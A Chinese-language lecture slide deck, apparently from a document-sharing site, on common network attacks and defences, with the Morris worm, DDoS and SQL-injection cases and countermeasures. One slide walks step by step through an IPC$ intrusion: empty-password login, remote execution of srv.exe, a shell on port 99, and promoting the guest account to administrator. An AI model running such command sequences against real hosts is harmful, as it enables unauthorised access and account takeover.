《{精品}网络攻击的常见手段与防范措施》由会员分享,可在线阅读,更多相关《{精品}网络攻击的常见手段与防范措施(43页珍藏版)》请在金锄头文库上搜索。
1、网络攻击的常见手段 与防范措施,目,录,一、计算机网络安全的概念,什么是网络安全?,网络安全:网络安全是指网络系统的硬件、软件及其系统中的数据受到保护,不因偶然的或者恶意的原因而遭受到破坏、更改、泄露,系统连续可靠正常地运行,网络服务不中断。,网络安全的主要特性,保密性 信息不泄露给非授权用户、实体或过程,或供其利用的特性。 完整性 数据未经授权不能进行改变的特性。即信息在存储或传输过程中保持不被修改、不被破坏和丢失的特性。,可用性 可被授权实体访问并按需求使用的特性。即当需要时能否存取所需的信息。例如网络环境下拒绝服务、破坏网络和有关系统的正常运行等都属于对可用性的攻击; 可控性 对信息的传
2、播及内容具有控制能力。 可审查性 出现安全问题时提供依据与手段,目,录,二、常见的网络攻击,黑客,黑客是程序员,掌握操作系统和编程语言方面的知识,乐于探索可编程系统的细节,并且不断提高自身能力,知道系统中的漏洞及其原因所在。专业黑客都是很有才华的源代码创作者。 起源: 20世纪60年代 目的: 基于兴趣非法入侵 基于利益非法入侵 信息战,Kevin Mitnick,凯文米特尼克是世界上最著名的黑客之一,第一个被美国联邦调查局通缉的黑客。 1979年,15岁的米特尼克和他的朋友侵入了北美空中防务指挥系统。,莫里斯蠕虫(Morris Worm),时间 1988年 肇事者 罗伯特塔潘莫里斯, 美国康
3、奈尔大学学生,其父是美国国家安全局安全专家 机理 利用sendmail, finger 等服务的漏洞,消耗CPU资源,拒绝服务 影响 Internet上大约6000台计算机感染,占当时Internet 联网主机总数的10%,造成9600万美元的损失 黑客从此真正变黑,黑客伦理失去约束,黑客传统开始中断。,2001年中美黑客大战,事件背景和经过 中美军机南海4.1撞机事件为导火线 4月初,以PoizonB0 x、pr0phet为代表的美国黑客组织对国内站点进行攻击,约300个左右的站点页面被修改 4月下旬,国内红(黑)客组织或个人,开始对美国网站进行小规模的攻击行动,4月26日有人发表了 “五一
4、卫国网战”战前声明,宣布将在5月1日至8日,对美国网站进行大规模的攻击行动。 各方都得到第三方支援 各大媒体纷纷报道,评论,中旬结束大战,PoizonB0 x、pr0phet更改的网页,中经网数据有限公司,中国科学院心理研究所,国内某政府网站,国内某大型商业网站,国内黑客组织更改的网站页面,美国劳工部网站,美国某节点网站,美国某大型商业网站,美国某政府网站,这次事件中采用的常用攻击手法,红客联盟负责人在5月9日网上记者新闻发布会上对此次攻击事件的技术背景说明如下: “我们更多的是一种不满情绪的发泄,大家也可以看到被攻破的都是一些小站,大部分都是NT/Win2000系统, 这个行动在技术上是没有
5、任何炫耀和炒作的价值的。” 主要采用当时流行的系统漏洞进行攻击,这次事件中被利用的典型漏洞,用户名泄漏,缺省安装的系统用户名和密码 Unicode 编码可穿越firewall,执行黑客指令 ASP源代码泄露可远程连接的数据库用户名和密码 SQL server缺省安装 微软Windows 2000登录验证机制可被绕过 Bind 远程溢出,Lion蠕虫 SUN rpc.sadmind 远程溢出,sadmin/IIS蠕虫 Wu-Ftpd 格式字符串错误远程安全漏洞 拒绝服务 (syn-flood , ping ),1980,1985,1990,1995,2000,密码猜测,可自动复制的代码,密码破解
6、,利用已知的漏洞,破坏审计系统,后门,会话劫持,擦除痕迹,嗅探,包欺骗,GUI远程控制,自动探测扫描,拒绝服务,www 攻击,工具,攻击者,入侵者水平,攻击手法,半开放隐蔽扫描,控制台入侵,检测网络管理,DDOS 攻击,2002,高,入侵技术的发展,目,录,常见的攻击方法,端口扫描:网络攻击的前奏 网络监听:局域网、HUB、ARP欺骗、网关设备 邮件攻击:邮件炸弹、邮件欺骗 网页欺骗:伪造网址、DNS重定向 密码破解:字典破解、暴力破解、md5解密 漏洞攻击:溢出攻击、系统漏洞利用 种植木马:隐蔽、免杀、网站挂马、邮件挂马 DoS、DDoS:拒绝服务攻击、分布式拒绝服务攻击 cc攻击:借助大量
7、代理或肉鸡访问最耗资源的网页 XSS跨站攻击、SQL注入:利用变量检查不严格构造javascript语句挂马或获取用户信息,或构造sql语句猜测表、字段以及管理员账号密码 社会工程学:QQ数据库被盗,端口 判断,判断 系统,选择 最简 方式 入侵,分析 可能 有漏 洞的 服务,获取 系统 一定 权限,提 升 为 最 高 权 限,安装 多个 系统 后门,清除 入侵 脚印,攻击其 他系统,获取敏 感信息,作为其 他用途,常见的系统入侵步骤,IP地址、主机是否运行、到要入侵点的路由、主机操作系统与用户信息等。,攻击步骤,1.收集主机信息,Ping命令判断计算机是否开着,或者数据包发送到返回需要多少时
8、间 Tracert/Tracerout命令跟踪从一台计算机到另外一台计算机所走的路径 Finger和Rusers命令收集用户信息 Host或者Nslookup命令,结合Whois和Finger命令获取主机、操作系统和用户等信息,应用的方法:,获取网络服务的端口作为入侵通道。,2.端口扫描,1.TCP Connect()2.TCP SYN 3.TCP FIN4.IP段扫瞄 5.TCP反向Ident扫瞄6.FTP代理扫瞄 7.UDP ICMP不到达扫瞄,7种扫瞄类型:,3、系统漏洞利用 一次利用ipc$的入侵过程,1. C:net use x.x.x.xIPC$ “” /user:“adminti
9、trator”用“流光”扫的用户名是administrator,密码为“空”的IP地址 2. C:copy srv.exe x.x.x.xadmin$ 先复制srv.exe上去,在流光的Tools目录下 3. C:net time x.x.x.x 查查时间,发现x.x.x.x 的当前时间是 2003/3/19 上午 11:00,命令成功完成。 4. C:at x.x.x.x 11:05 srv.exe 用at命令启动srv.exe吧(这里设置的时间要比主机时间推后) 5. C:net time x.x.x.x再查查时间到了没有,如果x.x.x.x 的当前时间是 2003/3/19 上午 11:
10、05,那就准备开始下面的命令。,6. C:telnet x.x.x.x 99 这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了 7.C:copy ntlm.exe 127.0.0.1admin$ntlm.exe也在流光的Tools目录中 8. C:WINNTsystem32ntlm 输入ntlm启动(这里的C:WINNTsystem32是在对方计算机上运行当出现“D
11、ONE”的时候,就说明已经启动正常。然后使用“net start telnet”来开启Telnet服务) 9. Telnet x.x.x.x,接着输入用户名与密码就进入对方了 10. C:net user guest /active:yes 为了方便日后登陆,将guest激活并加到管理组 11. C:net user guest 1234 将Guest的密码改为1234 12. C:net localgroup administrators guest /add 将Guest变为Administrator,目,录,北京时间10月22日凌晨,美国域名服务器管理服务供应商Dyn宣布,该公司在当地时
12、间周五早上遭遇了DDoS(分布式拒绝服务)攻击,从而导致许多网站在美国东海岸地区宕机,Twitter、Tumblr、Netflix、亚马逊、Shopify、Reddit、Airbnb、PayPal和Yelp等诸多人气网站无一幸免。Dyn称,攻击由感染恶意代码的设备发起,来自全球上千万IP地址,几百万恶意攻击的源头是物联网联系的所谓“智能”家居产品。,1、DDoS(分布式拒绝服务)攻击,攻击现象 被攻击主机上有大量等待的TCP连接; 网络中充斥着大量的无用的数据包; 源地址为假 制造高流量无用数据,造成网络拥塞,使受害主机无法正常和外界通讯; 利用受害主机提供的传输协议上的缺陷反复高速的发出特定
13、的服务请求,使主机无法处理所有正常请求; 严重时会造成系统死机。,分布式拒绝服务攻击:借助于C/S(客户/服务器)技术,将多个计算机联合起来作为攻击平台,对一个或多个目标发动DDoS攻击,从而成倍地提高拒绝服务攻击的威力,分布式拒绝服务攻击,攻击流程 1、搜集资料,被攻击目标主机数目、地址情况,目标主机的配置、性能,目标的宽带。 2、是占领和控制网络状态好、性能好、安全管理水平差的主机做傀儡机。 3、攻击者在客户端通过telnet之类的常用连接软件,向主控端发送发送对目标主机的攻击请求命令。主控端侦听接收攻击命令,并把攻击命令传到分布端,分布端是执行攻击的角色,收到命令立即发起flood攻击。
14、,主机设置 所有的主机平台都有抵御DoS的设置,基本的有: 1、关闭不必要的服务 2、限制同时打开的Syn半连接数目 3、缩短Syn半连接的time out 时间 4、及时更新系统补丁 网络设置 1.防火墙 禁止对主机的非开放服务的访问 限制同时打开的SYN最大连接数 限制特定IP地址的访问 启用防火墙的防DDoS的属性 严格限制对外开放的服务器的向外访问 第五项主要是防止自己的服务器被当做工具去害人。 2.路由器 设置SYN数据包流量速率 升级版本过低的ISO 为路由器建立log server,防范措施,雅虎作为美国著名的互联网门户网站,也是20世纪末互联网奇迹的创造者之一。然而在2013年
15、8月20日,中国雅虎邮箱宣布停止提供服务。就在大家已快将其淡忘的时候,雅虎公司突然对外发布消息,承认在2014年的一次黑客袭击中,至少5亿用户的数据信息遭窃。此次事件成为了有史以来规模最大的单一网站信息泄露事件。,2、SQL注入攻击,攻击方法 SQL注入主要是由于网页制作者对输入数据检查不严格,攻击者通过对输入数据的改编来实现对数据库的访问,从而猜测出管理员账号和密码; 如 改为 and user=admin; 如果页面显示正常,说明数据库表中有一个user字段,且其中有admin这个值; 通过SQL注入攻击可以探测网站后台管理员账号和密码。,SQL注入:就是通过把SQL命令插入到Web表单提
16、交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。,利用探测出的管理员账号和密码登陆网站后台,在拥有附件上传的功能模块中尝试上传网页木马或一句话木马(一般利用数据库备份和恢复功能); 通过网页木马探测IIS服务器配置漏洞,找到突破点提升权限,上传文件木马并在远程服务器上运行; 通过连接木马彻底拿到系统控制权; 因此,SQL注入只是网站入侵的前奏,就算注入成功也不一定可以拿到web shell或root。,1、输入验证 检查用户输入的合法性,确信输入的内容只包含合法的数据。 2、错误消息处理 防范SQL注入,还要避免出现一些详细的错误消息,因为黑客们可以利用这些消息。要使用一种标准的输入确认机制来验证所有的输入数据的长度、类型
